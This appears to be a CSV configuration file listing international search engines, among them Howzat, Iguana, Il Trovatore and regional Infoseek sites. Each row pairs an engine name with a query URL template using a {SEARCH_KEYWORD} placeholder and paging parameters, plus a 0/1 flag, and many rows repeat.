"International","Howzat Au 10 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=10","0"
"International","Howzat Au 10 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=10","0"
"International","Howzat Au 2 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=2","1"
"International","Howzat Au 2 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=2","0"
"International","Howzat Au 2 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=2","0"
"International","Howzat Au 2 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=2","0"
"International","Howzat Au 2 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=2","0"
"International","Howzat Au 2 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=2","0"
"International","Howzat Au 3 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=3","1"
"International","Howzat Au 3 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=3","0"
"International","Howzat Au 3 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=3","0"
"International","Howzat Au 3 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=3","0"
"International","Howzat Au 3 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=3","0"
"International","Howzat Au 3 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=3","0"
"International","Howzat Au 4 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=4","1"
"International","Howzat Au 4 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=4","0"
"International","Howzat Au 4 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=4","0"
"International","Howzat Au 4 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=4","0"
"International","Howzat Au 4 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=4","0"
"International","Howzat Au 4 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=4","0"
"International","Howzat Au 5 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=5","1"
"International","Howzat Au 5 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=5","0"
"International","Howzat Au 5 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=5","0"
"International","Howzat Au 5 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=5","0"
"International","Howzat Au 5 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=5","0"
"International","Howzat Au 5 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=5","0"
"International","Howzat Au 6 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=6","1"
"International","Howzat Au 6 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=6","0"
"International","Howzat Au 6 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=6","0"
"International","Howzat Au 6 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=6","0"
"International","Howzat Au 6 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=6","0"
"International","Howzat Au 6 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=6","0"
"International","Howzat Au 7 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=7","1"
"International","Howzat Au 7 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=7","0"
"International","Howzat Au 7 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=7","1"
"International","Howzat Au 7 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=7","0"
"International","Howzat Au 7 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=7","0"
"International","Howzat Au 7 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=7","0"
"International","Howzat Au 8 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=8","1"
"International","Howzat Au 8 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=8","0"
"International","Howzat Au 8 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=8","0"
"International","Howzat Au 8 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=8","0"
"International","Howzat Au 8 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=8","0"
"International","Howzat Au 8 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=8","0"
"International","Howzat Au 9 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=9","1"
"International","Howzat Au 9 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=9","0"
"International","Howzat Au 9 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=9","0"
"International","Howzat Au 9 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=9","0"
"International","Howzat Au 9 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=9","0"
"International","Howzat Au 9 (Next 10)","http://www.howzat.com.au/cgi-bin/howzat?restrict=;exclude=;config=htdig;method=and;words={SEARCH_KEYWORD};page=9","1"
"International","Iguana MX","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=1&last=10","1"
"International","Iguana MX","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=1&last=10","0"
"International","Iguana MX","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=1&last=10","0"
"International","Iguana MX","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=1&last=10","0"
"International","Iguana MX","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=1&last=10","0"
"International","Iguana MX","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=1&last=10","0"
"International","Iguana MX 2 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=11&last=20","1"
"International","Iguana MX 2 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=11&last=20","0"
"International","Iguana MX 2 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=11&last=20","0"
"International","Iguana MX 2 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=11&last=20","0"
"International","Iguana MX 2 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=11&last=20","0"
"International","Iguana MX 2 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=11&last=20","0"
"International","Iguana MX 3 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=21&last=30","1"
"International","Iguana MX 3 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=21&last=30","0"
"International","Iguana MX 3 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=21&last=30","0"
"International","Iguana MX 3 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=21&last=30","0"
"International","Iguana MX 3 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=21&last=30","0"
"International","Iguana MX 3 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=21&last=30","0"
"International","Iguana MX 4 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=31&last=40","1"
"International","Iguana MX 4 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=31&last=40","0"
"International","Iguana MX 4 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=31&last=40","0"
"International","Iguana MX 4 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=31&last=40","0"
"International","Iguana MX 4 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=31&last=40","0"
"International","Iguana MX 4 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=31&last=40","0"
"International","Iguana MX 5 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=41&last=50","1"
"International","Iguana MX 5 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=41&last=50","0"
"International","Iguana MX 5 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=41&last=50","0"
"International","Iguana MX 5 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=41&last=50","0"
"International","Iguana MX 5 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=41&last=50","0"
"International","Iguana MX 5 (Next 10)","http://www.iguana.com.mx/cgi-bin/iguana?words={SEARCH_KEYWORD}&first=41&last=50","0"
"International","Il Trovatore","http://search.iltrovatore.it/cgi-bin/index.cgi?q={SEARCH_KEYWORD}&cs=iso-8859-1","1"
"International","Il Trovatore","http://search.iltrovatore.it/cgi-bin/index.cgi?q={SEARCH_KEYWORD}&cs=iso-8859-1","0"
"International","Il Trovatore","http://search.iltrovatore.it/cgi-bin/index.cgi?q={SEARCH_KEYWORD}&cs=iso-8859-1","0"
"International","Il Trovatore","http://search.iltrovatore.it/cgi-bin/index.cgi?q={SEARCH_KEYWORD}&cs=iso-8859-1","0"
"International","Il Trovatore","http://search.iltrovatore.it/cgi-bin/index.cgi?q={SEARCH_KEYWORD}&cs=iso-8859-1","0"
"International","Il Trovatore","http://search.iltrovatore.it/cgi-bin/index.cgi?q={SEARCH_KEYWORD}&cs=iso-8859-1","0"
"International","Infoseek JP","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=0&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=100600","1"
"International","Infoseek JP","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=0&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=100600","0"
"International","Infoseek JP","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=0&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=100600","0"
"International","Infoseek JP","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=0&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=100600","0"
"International","Infoseek JP","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=0&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=100600","0"
"International","Infoseek JP","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=0&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=100600","0"
"International","Infoseek JP 2 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=10&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","1"
"International","Infoseek JP 2 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=10&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","0"
"International","Infoseek JP 2 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=10&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","0"
"International","Infoseek JP 2 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=10&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","0"
"International","Infoseek JP 2 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=10&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","0"
"International","Infoseek JP 2 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=10&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","0"
"International","Infoseek JP 3 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=20&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","1"
"International","Infoseek JP 3 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=20&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","0"
"International","Infoseek JP 3 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=20&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","0"
"International","Infoseek JP 3 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=20&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","0"
"International","Infoseek JP 3 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=20&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","0"
"International","Infoseek JP 3 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=20&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","0"
"International","Infoseek JP 4 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=30&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","1"
"International","Infoseek JP 4 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=30&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","1"
"International","Infoseek JP 4 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=30&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","0"
"International","Infoseek JP 4 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=30&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","0"
"International","Infoseek JP 4 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=30&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","0"
"International","Infoseek JP 4 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=30&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","0"
"International","Infoseek JP 5 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=40&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","1"
"International","Infoseek JP 5 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=40&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","0"
"International","Infoseek JP 5 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=40&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","0"
"International","Infoseek JP 5 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=40&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","0"
"International","Infoseek JP 5 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=40&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","0"
"International","Infoseek JP 5 (Next 10)","http://www.infoseek.co.jp/Titles?lk=noframes&qp=0&st=40&nh=10&col=WW&qt={SEARCH_KEYWORD}&svp=SEEK&svx=460106&rf=11&ud4=&wd=&nc=1","0"
"International","Infoseek NL","http://go.google.com/hws/search?client=disney-go&cof=AH%3Acenter%3BAWFID%3A7e572b45105f192b%3B&q={SEARCH_KEYWORD}","1"
"International","Infoseek NL","http://go.google.com/hws/search?client=disney-go&cof=AH%3Acenter%3BAWFID%3A7e572b45105f192b%3B&q={SEARCH_KEYWORD}","0"
"International","Infoseek NL","http://go.google.com/hws/search?client=disney-go&cof=AH%3Acenter%3BAWFID%3A7e572b45105f192b%3B&q={SEARCH_KEYWORD}","0"
"International","Infoseek NL","http://go.google.com/hws/search?client=disney-go&cof=AH%3Acenter%3BAWFID%3A7e572b45105f192b%3B&q={SEARCH_KEYWORD}","0"
"International","Infoseek NL","http://go.google.com/hws/search?client=disney-go&cof=AH%3Acenter%3BAWFID%3A7e572b45105f192b%3B&q={SEARCH_KEYWORD}","0"
"International","Infoseek NL","http://go.google.com/hws/search?client=disney-go&cof=AH%3Acenter%3BAWFID%3A7e572b45105f192b%3B&q={SEARCH_KEYWORD}","0"
"International","Infoseek NL 2 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=10","1"
"International","Infoseek NL 2 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=10","0"
"International","Infoseek NL 2 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=10","0"
"International","Infoseek NL 2 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=10","0"
"International","Infoseek NL 2 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=10","0"
"International","Infoseek NL 2 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=10","0"
"International","Infoseek NL 3 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=20","1"
"International","Infoseek NL 3 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=20","0"
"International","Infoseek NL 3 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=20","0"
"International","Infoseek NL 3 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=20","0"
"International","Infoseek NL 3 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=20","0"
"International","Infoseek NL 3 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=20","0"
"International","Infoseek NL 4 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=30","1"
"International","Infoseek NL 4 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=30","0"
"International","Infoseek NL 4 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=30","0"
"International","Infoseek NL 4 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=30","0"
"International","Infoseek NL 4 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=30","0"
"International","Infoseek NL 4 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=30","0"
"International","Infoseek NL 5 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=40","1"
"International","Infoseek NL 5 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=40","0"
"International","Infoseek NL 5 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=40","0"
"International","Infoseek NL 5 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=40","0"
"International","Infoseek NL 5 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=40","0"
"International","Infoseek NL 5 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=40","0"
"International","Infoseek SE","http://go.google.com/hws/search?client=disney-go&cof=AH%3Acenter%3BAWFID%3A7e572b45105f192b%3B&q={SEARCH_KEYWORD}","1"
"International","Infoseek SE","http://go.google.com/hws/search?client=disney-go&cof=AH%3Acenter%3BAWFID%3A7e572b45105f192b%3B&q={SEARCH_KEYWORD}","0"
"International","Infoseek SE","http://go.google.com/hws/search?client=disney-go&cof=AH%3Acenter%3BAWFID%3A7e572b45105f192b%3B&q={SEARCH_KEYWORD}","0"
"International","Infoseek SE","http://go.google.com/hws/search?client=disney-go&cof=AH%3Acenter%3BAWFID%3A7e572b45105f192b%3B&q={SEARCH_KEYWORD}","0"
"International","Infoseek SE","http://go.google.com/hws/search?client=disney-go&cof=AH%3Acenter%3BAWFID%3A7e572b45105f192b%3B&q={SEARCH_KEYWORD}","0"
"International","Infoseek SE","http://go.google.com/hws/search?client=disney-go&cof=AH%3Acenter%3BAWFID%3A7e572b45105f192b%3B&q={SEARCH_KEYWORD}","0"
"International","Infoseek SE 2 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=10","1"
"International","Infoseek SE 2 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=10","0"
"International","Infoseek SE 2 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=10","0"
"International","Infoseek SE 2 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=10","0"
"International","Infoseek SE 2 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=10","0"
"International","Infoseek SE 2 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=10","0"
"International","Infoseek SE 3 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=20","1"
"International","Infoseek SE 3 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=20","0"
"International","Infoseek SE 3 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=20","0"
"International","Infoseek SE 3 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=20","0"
"International","Infoseek SE 3 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=20","0"
"International","Infoseek SE 3 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=20","0"
"International","Infoseek SE 4 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=30","1"
"International","Infoseek SE 4 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=30","0"
"International","Infoseek SE 4 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=30","0"
"International","Infoseek SE 4 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=30","0"
"International","Infoseek SE 4 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=30","0"
"International","Infoseek SE 4 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=30","0"
"International","Infoseek Se 5 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=40","1"
"International","Infoseek Se 5 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=40","0"
"International","Infoseek Se 5 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=40","0"
"International","Infoseek Se 5 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=40","0"
"International","Infoseek Se 5 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=40","0"
"International","Infoseek Se 5 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&client=disney-go&start=40","0"
"International","Infoseek UK","http://go.google.com/hws/search?client=disney-go&cof=AH%3Acenter%3BAWFID%3A7e572b45105f192b%3B&q={SEARCH_KEYWORD}&sa.x=43&sa.y=18","1"
"International","Infoseek UK","http://go.google.com/hws/search?client=disney-go&cof=AH%3Acenter%3BAWFID%3A7e572b45105f192b%3B&q={SEARCH_KEYWORD}&sa.x=43&sa.y=18","0"
"International","Infoseek UK","http://go.google.com/hws/search?client=disney-go&cof=AH%3Acenter%3BAWFID%3A7e572b45105f192b%3B&q={SEARCH_KEYWORD}&sa.x=43&sa.y=18","0"
"International","Infoseek UK","http://go.google.com/hws/search?client=disney-go&cof=AH%3Acenter%3BAWFID%3A7e572b45105f192b%3B&q={SEARCH_KEYWORD}&sa.x=43&sa.y=18","0"
"International","Infoseek UK","http://go.google.com/hws/search?client=disney-go&cof=AH%3Acenter%3BAWFID%3A7e572b45105f192b%3B&q={SEARCH_KEYWORD}&sa.x=43&sa.y=18","0"
"International","Infoseek UK","http://go.google.com/hws/search?client=disney-go&cof=AH%3Acenter%3BAWFID%3A7e572b45105f192b%3B&q={SEARCH_KEYWORD}&sa.x=43&sa.y=18","0"
"International","Infoseek UK 2 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=10&sa=N","1"
"International","Infoseek UK 2 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=10&sa=N","0"
"International","Infoseek UK 2 (Next 10)","http://go.google.com/hws/search?q={SEARCH_KEYWORD}&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&output=xml_no_dtd&client=disney-go&start=10&sa=N","0"
